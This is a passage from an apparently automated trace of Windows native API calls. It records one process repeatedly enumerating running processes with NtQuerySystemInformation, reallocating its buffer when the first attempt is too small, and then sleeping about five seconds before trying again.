[0151.711] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.714] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.714] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.726] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.727] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.730] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.742] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.743] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.744] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.744] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.747] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.757] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.757] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.758] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.761] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.774] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.775] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.775] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.777] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.778] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.792] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.808] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.821] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.823] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.823] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.836] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.839] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.854] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.854] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.866] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.870] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.884] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.884] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.884] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.886] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.886] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.901] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.919] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.930] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.933] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.944] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.945] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.945] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.945] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.948] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.967] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.980] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0151.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0151.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0151.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0151.993] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0151.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0151.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0151.997] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.010] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0152.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0152.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0152.028] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0152.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0152.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0152.039] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0152.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: 